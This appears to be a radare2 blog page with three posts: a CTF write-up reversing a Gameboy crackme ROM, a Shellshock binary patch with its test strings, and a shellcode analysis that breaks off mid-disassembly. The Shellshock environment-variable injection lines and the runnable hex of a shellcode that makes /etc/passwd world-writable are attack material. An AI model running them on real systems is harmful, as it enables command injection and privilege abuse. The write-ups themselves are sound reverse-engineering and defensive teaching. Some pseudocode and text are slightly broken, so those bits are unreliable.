Solving "At gunpoint" from 2014 with radare2

Many thanks to crowell for giving us the permission to publish his writeup on this blog. Feel also free to take a look at depierre's one.

"At Gunpoint" was a 200 point Reversing challenge in ctf 2014. The description is as follows

You 're the sheriff of a small town, investigating news about a gangster squad  
passing by. Rumor has it they' re easy to outsmart, so you have just followed  
one to their encampment by the river.You know you can easily take them out one  
by one, if you would just know their secret handshake..  

Let's see what we are working with.

minishwoods hacklu/gunpoint» file gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat  
gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat: Gameboy ROM: "FLUX", [ROM ONLY], ROM: 256Kbit  

So it is a Gameboy ROM. I load it up in VisualBoyAdvance and see what the game is.


It is a static image, and after some time, we receive this text.


Looks like we will have to put in some inputs from the joypad to get the flag. It is a crackme style but for the Gameboy! Sounds fun.

First thing to do is to find out how the Gameboy interprets button presses.

According to this document here, the joypad is memory mapped to 0xFF00. So now that we have some sort of idea of what we are looking for, let's load up the ROM in radare2!

First, let's run the auto analysis and see what r2 can give us for functions. We run aa to analyze the binary, then afl to list the functions.

minishwoods hacklu/gunpoint » radare2 ./gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat  
 -- Fuck you, fuck you in the mouth, with a chair!
 [0x00000100]> aa
 [0x00000100]> afl
 0x00000100  35  1  entry0
 0x00000150  133  8  main
 0x00000123  178  8  fcn.00000123

Hm... not so great, just 3 functions. (note, since after the ctf ended, the latest git of r2 is much better at detecting Gameboy functions!)

Let's try to find usage of the joypad. Really what we are looking for is a load or store from 0xFF00, but I am lazy, and the ROM is small, so we can just disassembly everything and grep for it!

[0x00000100]> s 0; pd 10000 | grep ff00
Do you want to print 566.8K chars? (y/N)  
|           0x00000193    e2           ld [0xff00 + c], a
            0x00000c84    f000         ld a, [0xff00]
|           0x00001e63    e000         ld [0xff00], a
|           0x00001e65    f000         ld a, [0xff00]
|           0x00001e67    f000         ld a, [0xff00]
|           0x00001e71    e000         ld [0xff00], a
|           0x00001e73    f000         ld a, [0xff00]
|           0x00001e75    f000         ld a, [0xff00]
|           0x00001e77    f000         ld a, [0xff00]
|           0x00001e79    f000         ld a, [0xff00]
|           0x00001e7b    f000         ld a, [0xff00]
|           0x00001e7d    f000         ld a, [0xff00]
|           0x00001e88    e000         ld [0xff00], a
            0x00002307    e2           ld [0xff00 + c], a
            0x00002317    f2           ld a, [0xff00 + c]
            0x0000233f    f2           ld a, [0xff00 + c]
            0x00002342    f2           ld a, [0xff00 + c]
            0x00002717    f2           ld a, [0xff00 + c]

Perfect, not many uses, and it looks like there are a few small groups that are touching 0xFF00, so probably just a few functions that interact with the joypad.

So, seek to 0x1e63 (s 0x1e63), then open up visual mode with V. Scroll up a bit to see that at 0x1e5f is a ret, then 0x1e60 is push bc. The push instruction looks to be the start of a function that interacts with the joypad quite a bit. So we can define this as a function from visual mode with df. (If you have a newer version of r2, this is probably already done for you).

Checking back at the Gameboy document, The function looks very similar, in fact, it nearly identical to the joypad reader from Ms. PacMan.

Code from Ms. PacMan is here

       Example code:

          Game: Ms. Pacman
          Address: $3b1

        LD A,$20       <- bit 5 = $20
        LD ($FF00),A   <- select P14 by setting it low
        LD A,($FF00)
        LD A,($FF00)   <- wait a few cycles
        CPL            <- complement A
        AND $0F        <- get only first 4 bits
        SWAP A         <- swap it
        LD B,A         <- store A in B
        LD A,$10
        LD ($FF00),A   <- select P15 by setting it low
        LD A,($FF00)
        LD A,($FF00)
        LD A,($FF00)
        LD A,($FF00)
        LD A,($FF00)
        LD A,($FF00)   <- Wait a few MORE cycles
        CPL            <- complement (invert)
        AND $0F        <- get first 4 bits
        OR B           <- put A and B together

        LD B,A         <- store A in D
        LD A,($FF8B)   <- read old joy data from ram
        XOR B          <- toggle w/current button bit
        AND B          <- get current button bit back
        LD ($FF8C),A   <- save in new Joydata storage
        LD A,B         <- put original value in A
        LD ($FF8B),A   <- store it as old joy data

        LD A,$30       <- deselect P14 and P15
        LD ($FF00),A   <- RESET Joypad
        RET            <- Return from Subroutine

          The button values using the above method are such:
          $80 - Start             $8 - Down
          $40 - Select            $4 - Up
          $20 - B                 $2 - Left
          $10 - A                 $1 - Right

          Let's say we held down A, Start, and Up.
          The value returned in accumulator A would be $94jkj

And the code we have here.

/ (fcn) fcn.00001e60 45
|          0x00001e60    c5           push bc
|          0x00001e61    3e20         ld a, 0x20
|          ;  JOYPAD
|          0x00001e63    e000         ld [0xff00], a
|          ;  JOYPAD
|          0x00001e65    f000         ld a, [0xff00]
|          ;  JOYPAD
|          0x00001e67    f000         ld a, [0xff00]
|          0x00001e69    2f           cpl
|          0x00001e6a    e60f         and 0x0f
|          0x00001e6c    cb37         swap a
|          0x00001e6e    47           ld b, a
|          0x00001e6f    3e10         ld a, 0x10
|          ;  JOYPAD
|          0x00001e71    e000         ld [0xff00], a
|          ;  JOYPAD
|          0x00001e73    f000         ld a, [0xff00]
|          ;  JOYPAD
|          0x00001e75    f000         ld a, [0xff00]
|          ;  JOYPAD
|          0x00001e77    f000         ld a, [0xff00]
|          ;  JOYPAD
|          0x00001e79    f000         ld a, [0xff00]
|          ;  JOYPAD
|          0x00001e7b    f000         ld a, [0xff00]
|          ;  JOYPAD
|          0x00001e7d    f000         ld a, [0xff00]
|          0x00001e7f    2f           cpl
|          0x00001e80    e60f         and 0x0f
|          0x00001e82    b0           or b
|          0x00001e83    cb37         swap a
|          0x00001e85    47           ld b, a
|          0x00001e86    3e30         ld a, 0x30
|          ;  JOYPAD
|          0x00001e88    e000         ld [0xff00], a
|          0x00001e8a    78           ld a, b
|          0x00001e8b    c1           pop bc
\          0x00001e8c    c9           ret

Looks really similar, doesn't it? ;) So we can see here, that value of the joypad is now stored in register A from 0x1e8a. Seek to the beginning of the function and define the function with a name like read_joypad with dr in visual mode.

So, now that we know what reads the joypad, we can find the xrefs to find out the checking routine. From visual mode, at the top of read_joypad, hit x to see the xrefs.

[GOTO XREF]> 65 ./gunpoint_2daf5fe3fb236b398ff9e5705a058a7f.dat]> pd $r @ read_joypad
[0] 0x00001e60 CODE (CALL) XREF 0x00001e54 (fcn.00001e50)
[1] 0x00001e60 CODE (CALL) XREF 0x00001e8d (fcn.00001e8d)
[2] 0x00001e60 CODE (CALL) XREF 0x00001e94 (fcn.00001e94)

We see 3 cross references, which means we have 3 other functions calling the read_joypad function.

Looking at xref2, we see that the joypad is read, and then the value is also stored into register e

/ (fcn) load_joypad_to_e 5
|          0x00001e94    cd601e       call read_joypad ;[1]
|             read_joypad(0x0, 0x0, 0x0)
|          0x00001e97    5f           ld e, a
\          0x00001e98    c9           ret

Essentially, in pseudocode

a = read_joypad();  
e = a;  

For some time I was stuck here, as it didn't seem that the load_joypad_to_e was called anywhere, r2 did not find any calls, but we can use the same trick we used to find the references to the memory mapped io of the joypad to find references to the load_joypad_to_e.

[0x00001e94]> s 0; pd 10000 | grep load_joypad
Do you want to print 566.8K chars? (y/N)  
  --------> 0x00000d6f    cd941e       call load_joypad_to_e
          >    load_joypad_to_e()
  / (fcn) load_joypad_to_e 5

Looks like it is referenced just once, so seek to 0xd6f and open visual mode. Looks to be the beginning of a big block of code, define as a function and start reversing. I defined it as checker_loop once I realized that this is the main crackme part.

It looks like the auto analysis fails to detect the proper end of the function. This is fine, because we can tell r2 exactly how long the function is ourselves.

Looking at the code, the last instruction of the function is the ret at 0xf01, so, by starting at 0xd6f the function should be 403 bytes. Just
define the function like this

[0x00000e5f]> af+ 0xd6f 403 checker_loop

Now we can disassemble the entire function with pdf @ checker_loop.

/ (fcn) checker_loop 403
|           0x00000d6f    cd941e       call load_joypad_to_e
|              load_joypad_to_e()
|           0x00000d72    21a2c0       ld hl, 0xc0a2
|           0x00000d75    73           ld [hl], e
|           0x00000d76    21a1c0       ld hl, 0xc0a1
|           0x00000d79    7e           ld a, [hl]
|           0x00000d7a    21a2c0       ld hl, 0xc0a2
|           0x00000d7d    be           cp [hl]
|       ,=< 0x00000d7e    2003         jr nZ, 0x03
|      ,==< 0x00000d80    c3f60e       jp loc.00000ef6
|      |`-> 0x00000d83    21a0c0       ld hl, 0xc0a0
|      |    0x00000d86    7e           ld a, [hl]
|      |    0x00000d87    fe0d         cp 0x0d
|     ,===< 0x00000d89    c2990d       jp nZ, 0x0d99
|    ,====< 0x00000d8c    1803         jr 0x03 ; (checker_loop)
|   ,=====< 0x00000d8e    c3990d       jp 0x0d99 ; (checker_loop)
|   |`----> 0x00000d91    21a0c0       ld hl, 0xc0a0
|   | ||    0x00000d94    3600         ld [hl], 0x00
|  ,======< 0x00000d96    c38a0e       jp loc.00000e8a
|  |`-`---> 0x00000d99    21a2c0       ld hl, 0xc0a2
|  |   |    0x00000d9c    7e           ld a, [hl]
|  |   |    0x00000d9d    e604         and 0x04
| ,=======< 0x00000d9f    2003         jr nZ, 0x03
| ========< 0x00000da1    c3c90d       jp loc.00000dc9
| `-------> 0x00000da4    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000da7    7e           ld a, [hl]
|  |   |    0x00000da8    b7           or a
| ========< 0x00000da9    caba0d       jp Z, 0x0dba
|  |   |    0x00000dac    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000daf    7e           ld a, [hl]
|  |   |    0x00000db0    fe04         cp 0x04
| ========< 0x00000db2    c2c10d       jp nZ, 0x0dc1
| ========< 0x00000db5    1803         jr 0x03 ; (checker_loop)
| ========< 0x00000db7    c3c10d       jp 0x0dc1 ; (checker_loop)
| --------> 0x00000dba    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000dbd    34           inc [hl]
| ========< 0x00000dbe    c38a0e       jp loc.00000e8a
| --------> 0x00000dc1    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000dc4    3600         ld [hl], 0x00
| ========< 0x00000dc6    c38a0e       jp loc.00000e8a
|- loc.00000dc9 49
| --------> 0x00000dc9    21a2c0       ld hl, 0xc0a2
|  |   |    0x00000dcc    7e           ld a, [hl]
|  |   |    0x00000dcd    e601         and 0x01
| ========< 0x00000dcf    2003         jr nZ, 0x03
| ========< 0x00000dd1    c3fa0d       jp loc.00000dfa
| --------> 0x00000dd4    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000dd7    7e           ld a, [hl]
|  |   |    0x00000dd8    fe01         cp 0x01
| ========< 0x00000dda    caeb0d       jp Z, 0x0deb
|  |   |    0x00000ddd    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000de0    7e           ld a, [hl]
|  |   |    0x00000de1    fe05         cp 0x05
| ========< 0x00000de3    c2f20d       jp nZ, 0x0df2
| ========< 0x00000de6    1803         jr 0x03 ; (loc.00000dc9)
| ========< 0x00000de8    c3f20d       jp 0x0df2 ; (loc.00000dc9)
| --------> 0x00000deb    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000dee    34           inc [hl]
| ========< 0x00000def    c38a0e       jp loc.00000e8a
| --------> 0x00000df2    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000df5    3600         ld [hl], 0x00
\ ========< 0x00000df7    c38a0e       jp loc.00000e8a
|- loc.00000dfa 49
| --------> 0x00000dfa    21a2c0       ld hl, 0xc0a2
|  |   |    0x00000dfd    7e           ld a, [hl]
|  |   |    0x00000dfe    e608         and 0x08
| ========< 0x00000e00    2003         jr nZ, 0x03
| ========< 0x00000e02    c32b0e       jp loc.00000e2b
| --------> 0x00000e05    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e08    7e           ld a, [hl]
|  |   |    0x00000e09    fe02         cp 0x02
| ========< 0x00000e0b    ca1c0e       jp Z, 0x0e1c
|  |   |    0x00000e0e    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e11    7e           ld a, [hl]
|  |   |    0x00000e12    fe06         cp 0x06
| ========< 0x00000e14    c2230e       jp nZ, 0x0e23
| ========< 0x00000e17    1803         jr 0x03 ; (loc.00000dfa)
| ========< 0x00000e19    c3230e       jp 0x0e23 ; (loc.00000dfa)
| --------> 0x00000e1c    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e1f    34           inc [hl]
| ========< 0x00000e20    c38a0e       jp loc.00000e8a
| --------> 0x00000e23    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e26    3600         ld [hl], 0x00
\ ========< 0x00000e28    c38a0e       jp loc.00000e8a
|- loc.00000e2b 49
| --------> 0x00000e2b    21a2c0       ld hl, 0xc0a2
|  |   |    0x00000e2e    7e           ld a, [hl]
|  |   |    0x00000e2f    e602         and 0x02
| ========< 0x00000e31    2003         jr nZ, 0x03
| ========< 0x00000e33    c35c0e       jp loc.00000e5c
| --------> 0x00000e36    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e39    7e           ld a, [hl]
|  |   |    0x00000e3a    fe03         cp 0x03
| ========< 0x00000e3c    ca4d0e       jp Z, 0x0e4d
|  |   |    0x00000e3f    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e42    7e           ld a, [hl]
|  |   |    0x00000e43    fe07         cp 0x07
| ========< 0x00000e45    c2540e       jp nZ, 0x0e54
| ========< 0x00000e48    1803         jr 0x03 ; (loc.00000e2b)
| ========< 0x00000e4a    c3540e       jp 0x0e54 ; (loc.00000e2b)
| --------> 0x00000e4d    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e50    34           inc [hl]
| ========< 0x00000e51    c38a0e       jp loc.00000e8a
| --------> 0x00000e54    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e57    3600         ld [hl], 0x00
\ ========< 0x00000e59    c38a0e       jp loc.00000e8a
|- loc.00000e5c 95
| --------> 0x00000e5c    21a2c0       ld hl, 0xc0a2
|  |   |    0x00000e5f    7e           ld a, [hl]
|  |   |    0x00000e60    e610         and 0x10
| ========< 0x00000e62    2003         jr nZ, 0x03
| ========< 0x00000e64    c38a0e       jp loc.00000e8a
| --------> 0x00000e67    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e6a    7e           ld a, [hl]
|  |   |    0x00000e6b    fe0a         cp 0x0a
| ========< 0x00000e6d    ca7e0e       jp Z, 0x0e7e
|  |   |    0x00000e70    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e73    7e           ld a, [hl]
|  |   |    0x00000e74    fe0b         cp 0x0b
| ========< 0x00000e76    c2850e       jp nZ, 0x0e85
| ========< 0x00000e79    1803         jr 0x03 ; (loc.00000e5c)
| ========< 0x00000e7b    c3850e       jp 0x0e85 ; (loc.00000e5c)
| --------> 0x00000e7e    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e81    34           inc [hl]
| ========< 0x00000e82    c38a0e       jp loc.00000e8a
| --------> 0x00000e85    21a0c0       ld hl, 0xc0a0
|  |   |    0x00000e88    3600         ld [hl], 0x00
|  |        ; XREFS: JMP 0x00000dbe  JMP 0x00000dc6  JMP 0x00000def
|  |        ; XREFS: JMP 0x00000df7  JMP 0x00000e20  JMP 0x00000e28
|  |        ; XREFS: JMP 0x00000e51  JMP 0x00000e59  JMP 0x00000e82
|  |        ; XREFS: JMP 0x00000e64
|- loc.00000e8a 49
| -`------> 0x00000e8a    21a2c0       ld hl, 0xc0a2
|      |    0x00000e8d    7e           ld a, [hl]
|      |    0x00000e8e    e620         and 0x20
| ========< 0x00000e90    2003         jr nZ, 0x03
| ========< 0x00000e92    c3bb0e       jp loc.00000ebb
| --------> 0x00000e95    21a0c0       ld hl, 0xc0a0
|      |    0x00000e98    7e           ld a, [hl]
|      |    0x00000e99    fe08         cp 0x08
| ========< 0x00000e9b    caac0e       jp Z, 0x0eac
|      |    0x00000e9e    21a0c0       ld hl, 0xc0a0
|      |    0x00000ea1    7e           ld a, [hl]
|      |    0x00000ea2    fe09         cp 0x09
| ========< 0x00000ea4    c2b30e       jp nZ, 0x0eb3
| ========< 0x00000ea7    1803         jr 0x03 ; (loc.00000e8a)
| ========< 0x00000ea9    c3b30e       jp 0x0eb3 ; (loc.00000e8a)
| --------> 0x00000eac    21a0c0       ld hl, 0xc0a0
|      |    0x00000eaf    34           inc [hl]
| ========< 0x00000eb0    c3f60e       jp loc.00000ef6
| --------> 0x00000eb3    21a0c0       ld hl, 0xc0a0
|      |    0x00000eb6    3600         ld [hl], 0x00
\ ========< 0x00000eb8    c3f60e       jp loc.00000ef6
|- loc.00000ebb 43
| --------> 0x00000ebb    21a2c0       ld hl, 0xc0a2
|      |    0x00000ebe    7e           ld a, [hl]
|      |    0x00000ebf    e680         and 0x80
| ========< 0x00000ec1    2003         jr nZ, 0x03
| ========< 0x00000ec3    c3e60e       jp loc.00000ee6
| --------> 0x00000ec6    21a0c0       ld hl, 0xc0a0
|      |    0x00000ec9    7e           ld a, [hl]
|      |    0x00000eca    fe0c         cp 0x0c
| ========< 0x00000ecc    c2de0e       jp nZ, 0x0ede
| ========< 0x00000ecf    1803         jr 0x03 ; (loc.00000ebb)
| ========< 0x00000ed1    c3de0e       jp 0x0ede ; (loc.00000ebb)
| --------> 0x00000ed4    cd0002       call 0x0200
|         >    0x00000200() ; main+176
|      |    0x00000ed7    21a0c0       ld hl, 0xc0a0
|      |    0x00000eda    34           inc [hl]
| ========< 0x00000edb    c3f60e       jp loc.00000ef6
| --------> 0x00000ede    21a0c0       ld hl, 0xc0a0
|      |    0x00000ee1    3600         ld [hl], 0x00
\ ========< 0x00000ee3    c3f60e       jp loc.00000ef6
|- loc.00000ee6 27
| --------> 0x00000ee6    21a2c0       ld hl, 0xc0a2
|      |    0x00000ee9    7e           ld a, [hl]
|      |    0x00000eea    e640         and 0x40
| ========< 0x00000eec    2003         jr nZ, 0x03
| ========< 0x00000eee    c3f60e       jp loc.00000ef6
| --------> 0x00000ef1    21a0c0       ld hl, 0xc0a0
|      |    0x00000ef4    3600         ld [hl], 0x00
|- loc.00000ef6 11
| -----`--> 0x00000ef6    21a2c0       ld hl, 0xc0a2
|           0x00000ef9    7e           ld a, [hl]
|           0x00000efa    21a1c0       ld hl, 0xc0a1
|           0x00000efd    77           ld [hl], a
\           0x00000efe    c36f0d       jp checker_loop
\           0x00000f01    c9           ret

Yikes! This is a long function. With r2 we have a lot of tools at our disposal though, and we can use the graph view to get a better high-level understanding of the code.

We can load up a graph visualization with either VV for an ascii view, or a graphviz view with ag. I like to use the graphviz output with xdot.

[0x00000d6f]> ag $$ | xdot

And we get a nice graph like this. I have some annotations on mine, from reversing the function myself. This is helpful for looking at the overall way the function works. It seems to have a cascading check, like

if(){}else if{}else if{}else{}

type structure, which makes sense for value and index checking.


So, after some analysis, and guessing, we can figure the following. There is some debouncing/not expected to be perfect for clock cycles for button presses, so there must be tolerance for 0xFF00 to be the same for multiple cycles, or to be 0 with no penalty.

This means that the previous value must be stored somewhere, and that checks for empty press is somewhere too. From looking at the assembly, and the graph, I can piece together this as pseudocode.

void main_checker() {  
  byte reg_E;
  byte reg_A;
  byte* curr_press = 0xc0a2;
  byte* prev_press = 0xc0a1;
  byte* num_correct = 0xc0a0;
  reg_E = load_joypad_to_e();
  *curr_press = reg_E;
  reg_A = *prev_press;
  if (*curr_press == *prev_press) {
    goto begin;
  if (*curr_press == 0x00) {
    goto begin;
  do {
    if (*curr_press == 0x01) {
      if (*num_correct == 1 || *num_correct == 5) {
      } else {
        *num_correct = 0;
    } else if (*curr_press == 0x02) {
      if (*num_correct == 3 || num_correct == 7) {
      } else {
        *num_correct = 0;
    } else if (*curr_press == 0x04) {
      if (*num_correct == 0 || *num_correct == 4) {
      } else {
        *num_correct = 0;
    } else if (*curr_press == 0x08) {
      if (*num_correct == 2 || *num_correct == 6) {
      } else {
        *num_correct = 0;
    } else if (*curr_press == 0x10) {
      if (*num_correct == 10 || *num_correct == 11) {
      } else {
        *num_correct = 0;
    } else if (*curr_press == 0x20) {
      if (*num_correct == 8 || *num_correct == 9) {
      } else {
        *num_correct = 0;
    } else if (*curr_press == 0x80) {
      if (*num_correct == 12) {
      } else {
        *num_correct = 0;
    } else {
      *num_correct = 0;
    *prev_press = *curr_press;
  } while (*num_correct != 0x0D);

The only thing left to do is to cross reference the button presses with their values, and extract the order from that code.

4 - up  
1 - right  
8 - down  
2 - left  
4 - up  
1 - right  
8 - down  
2 - left  
20 - B  
20 - B  
10 - A  
10 - A  
80 - Start  
$80 - Start             $8 - Down
$40 - Select            $4 - Up
$20 - B                 $2 - Left
$10 - A                 $1 - Right

Plug it in to VisualBoyAdvance and grab our 200 points!


Thanks to FluxFingers for a great CTF!

Comments? Questions?

Shellshock r2 fix

A lot have been discussed recently about this vulnerability in bash. The internet was totally shocked just like what happened with heartbleed.

Several vulnerabilities have been discovered in bash, which caused the distros to release several updates on the same package and being a little chaotic to know which was the correct patch to take.

The vulnerability was not just affecting local users which have a little risk, but webservers running CGIs because http parameters are passed as environment variables to the script which was executing the functions defined in there.

Finally, it seems that the tempest is calming down and everyone is happy again with the GNU Bourne Again Shell.

But vulnerabilities in security are always not correctly patched, or even properly updated all the affected systems. This is the case of critical servers which can't be easily updated or require too much manual intervention like compiling a new version of the shell by hand, etc.

On embedded systems, this is probably the worst place, because they tend to be poorly updated, luckily few embedded systems use bash for memory constrains reasons. But the vulnerable systems are still there.

At the moment of writing Apple didnt released a security update to fix that vulnerability on OSX. So this exposes all the OSX users and servers.

UPDATE: Apple just released an update while I'm writing that blog post.

The binary patch

After reading some links I found some people doing binary patching for fixing the vulnerability (by removing the functionality).

As the comment describes, the patch consists on nullifying the first byte in every search result of '() {\x00'.

Solar Designer has implemented a Perl oneliner to fix it which is described on Bruce's blog and also twitted here.

perl -pe 's/\(\) {\0/(){\0\0/g' < /bin/bash

This is a good oportunity for showing how to do this with r2 and explain what the patch does.

r2 -qnwc '/ () {\x00;wx 00@@ *' /bin/bash

In essence the patch length is the same as in Perl. that give us a quite good compression ratio :)

Let's explain what the r2 oneliner does:


  • -q : quit after running all the -c commands
  • -n : do not load rbin information
  • -w : open the file in read-write mode
  • -c : run the following command


  • / () {\x00 : searches the string () { finalized with a null byte.
  • wx 00 @@ * : writes a null byte (Write heX 0x00) at the very first byte of each search hit.

Patching OSX

I have tested this in my local Mac and it worked as expected:

$ /bin/bash --version
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Copyright (C) 2007 Free Software Foundation, Inc.
$ cp /bin/bash .
$ env x='() { :;}; echo vulnerable' ./bash -c ":"
$ r2 -qnwc '/ () {\x00;wx 00@@ *' bash
$ env x='() { :;}; echo vulnerable' ./bash -c ":"

If we look closer of what that patch is doing we will notice that in OSX it will be patching that null byte in two places. This is because that bin is a fatmach0 that contains the x86-32 and x86-64 programs. We can extract them with this command:

$ rabin2 -x bash
bash.fat/bash.x86_64.0 created (612336)
bash.fat/bash.x86_32.1 created (609744)

Here we'll see that each file contains only one result for searching "() {\x00".

Understanding the patch

The patch is chopping a string in an array of them which is used to permit the function definition support on environment variables.

That binary patch is just disabling the functionality that this patch is fixing .

That will make the STREQN conditional to always be true.

As long as this is an exotic functionality I guess the patch will not break any bash script. Anyway it's always good to keep a copy of the original binary before patching it to compare or be able to go back to the previous state.

Other vulnerabilities

Other vulnerabilities has been also found in bash caused by not correctly fixing the problem or similar ways to exploit the bug.

You can find them all at here. I'll list them and mark them as FIXED if the patch fixes the problem (tested on OSX)

Should not say "vulnerable" (FIXED)

env x='() { :;}; echo vulnerable' bash -c ":"

Should not display the date (FIXED)

env X='() { (>\' bash -c "echo date"; cat echo ; rm -f echo

Should not say "vulnerable" (FIXED)

env -i X=' () { }; echo vulnerable' bash -c 'date'

Should not crash (NOT AFFECTED)

bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

Shold not display the CVE number (NOT AFFECTED)

(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

You can find a script that collects all the patches for bash on this github.


Adventures with Radare2 #1: A Simple Shellcode Analysis

Posted on July 17, 2011 by Edd, on

Radare2 is an open-source reverse engineering toolkit, consisting of a disassembler, debugger and hex editor. In this article I will show you the basics by reversing some shellcode I found on Project Shellcode.

To put this into context let's briefly discuss what we mean by the term "shellcode", not to be confused with "shellscript", which is something else entirely. "Shellcode" is a term colloquially used to refer to the payload of an exploit. Typically this would be code injected to start a shell.

Project Shellcode is a repository of shellcodes (with source), which I found via last month (thanks polsab); let's look at one of the examples found there.
60 Bytes Chmod 777 Polymorphic x86 Linux Shellcode

The first shellcode I happened to look at from projectshellcode was this

0   _                   __           __       __                   1  
1 /' \            __  /'__`\        /\ \__  /'__`\                 0  
0/\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___         1  
1\/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\        0  
0   \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/         1  
1    \ \_\ \_\ \_\_\ \ \ \___./\ \.___\\ \__\\ \.___/\ \_\         0  
0     \/_/\/_/\/_/\ \_\ \/___/  \/___/ \/__/ \/___/  \/_/          1  
1                \ \___./ >> Exploit database separated by         0  
0                 \/___/     exploit type (local, remote, DoS, ..) 1  
1                                                                  1  
0  [+] Site            :                              0  
1  [+] Support e-mail  : submit[at]                    1  
0                                                                  0  
Name   : 60 bytes chmod 777 polymorphic x86 linux shellcode  
Date   : Sat Jun  5 16:10:00 2010  
Author : gunslinger_  
Web    :  
blog   :  
tested on : linux debian  
special thanks to : r0073r (, d3hydr8 (,  
ty miller (, jonathan salwan(,  
mywisdom (, loneferret (  

root@localhost# ls -la /etc/passwd  
-rw-r--r-- 1 root root 1869 2010-05-08 15:53 /etc/passwd
root@localhost# gcc -o polymorphic_chmod polymorphic_chmod.c  
chmod.c: In function 'main':  
chmod.c:37: warning: incompatible implicit declaration of built-in function ‘strlen’  
root@localhost# ./polymorphic_chmod  
Length: 64  
root@localhost# ls -la /etc/passwd  
-rwxrwxrwx 1 root root 1869 2010-05-08 15:53 /etc/passwd
root@localhost# chmod 644 /etc/passwd  
root@localhost# ls -la /etc/passwd  
-rw-r--r-- 1 root root 1869 2010-05-08 15:53 /etc/passwd

#include &lt;stdio.h&gt;

char shellcode[] =  

int main(void) {  
    (*(void(*)()) shellcode)();
    return 0;

Thanks to gunslinger for allowing me to use this code as an example.

UPDATE: Current r2 comes with 'ragg2'a tool designed to construct shellcodes and executes them. That C code can be replaced with a shellscript like this:

$ rarun2 -x -B eb115e31c9b127806c0eff3580e90175f6eb05e8eaffffff204a66f5e5449066fe9bee343602b566f5e536661002b51d1b343434649aa99864a596a8a8ac99 

The description in comments claims that the code sets the file permissions on /etc/passwd to 777, but you would not know that at a glance. What we do know is that we have an array of bytes initialised as hex, which is then cast to a function pointer and called.

Analysis with Radare2

So how do we find out what this program does? We could build it and run it, but I won't, as it could remove my home directory for all I know. Instead let us examine it statically using radare2.

First we build a binary:

% cc -o shellcode polymorphic_chmod_etc_passwd_777.c
polymorphic_chmod_etc_passwd_777.c: In function 'main':  
polymorphic_chmod_etc_passwd_777.c:53: warning: incompatible implicit  
declaration of built-in function 'strlen'  

Next we ignore the warning, and now we load it into radare2:

% r2 ./shellcode
 -- In soviet russia radare debugs you!

I started radare2 without -d, so we are running in "static" mode, as opposed to using the debugger built into radare2. Now radare is ready and waiting for commands, so let's get to it.

Radare2 commands tend to be very short, some only one letter long. Type ? followed by enter to get an overview of what you can do. Suffixing a command with a question mark, will give more detailed information on it's usage.

What we should first do is locate that byte string. Because our binary was not stripped, we have the luxury of knowing what the virtual address of 'main' is. Radare2 uses the concept of "flags" to mark useful locations in binaries. Try typing f to see a list of flags. The function main will be flagged as 'sym.main'.

We use the pd command to disassemble:

[0x1c000764]> pd@sym.main
      0x1c000764  sym.main:
      0x1c000764    0    lea ecx, [esp+0x4]
      0x1c000768    0    and esp, 0xfffffff0
      0x1c00076b    0    push dword [ecx-0x4]
      0x1c00076e    4+   push ebp
      0x1c00076f    8+   mov ebp, esp
      0x1c000771    8    push ecx
      0x1c000772   12+   sub esp, 0x14
      0x1c000775   32+   mov dword [esp], sym.shellcode
      0x1c00077c   32>   call dword imp.strlen
         ; imp.strlen() [1]
      0x1c000781   32    mov edx, 0x3c0031d8
      0x1c000786   32    mov [esp+0x8], eax
      0x1c00078a   32    mov dword [esp+0x4], str.Lengthd
      0x1c000792   32    mov [esp], edx
      0x1c000795   32>   call dword imp.fprintf
         ; imp.fprintf() [2]
      0x1c00079a   32    mov eax, sym.shellcode
      0x1c00079f   32    call eax

The pd command will disassemble a chunk of code equal to the "block size" (see the 'b' command) and in this case it looks like main was bigger than our block size. Because we know that GCC will make "well-formed" functions, we ask radare2 to analyse this function and print it in its entirety:

[0x1c000764]> af@sym.main
[0x1c000764]> pdf@sym.main
/ function: sym.main (75)
|     0x1c000764  sym.main:
|     0x1c000764    0    8d4c2404         lea ecx, [esp+0x4]
|     0x1c000768    0    83e4f0           and esp, 0xfffffff0
|     0x1c00076b    0    ff71fc           push dword [ecx-0x4]
|     0x1c00076e    4+   55               push ebp
|     0x1c00076f    8+   89e5             mov ebp, esp
|     0x1c000771    8    51               push ecx
|     0x1c000772   12+   83ec14           sub esp, 0x14
|     0x1c000775   32+   c704244010003c   mov dword [esp], sym.shellcode
|     0x1c00077c   32>   e86bfdffff       call dword imp.strlen
|        ; imp.strlen() [1]
|     0x1c000781   32    bad831003c       mov edx, 0x3c0031d8
|     0x1c000786   32    89442408         mov [esp+0x8], eax
|     0x1c00078a   32    c74424040100003c mov dword [esp+0x4], str.Lengthd
|     0x1c000792   32    891424           mov [esp], edx
|     0x1c000795   32>   e822fdffff       call dword imp.fprintf
|        ; imp.fprintf() [2]
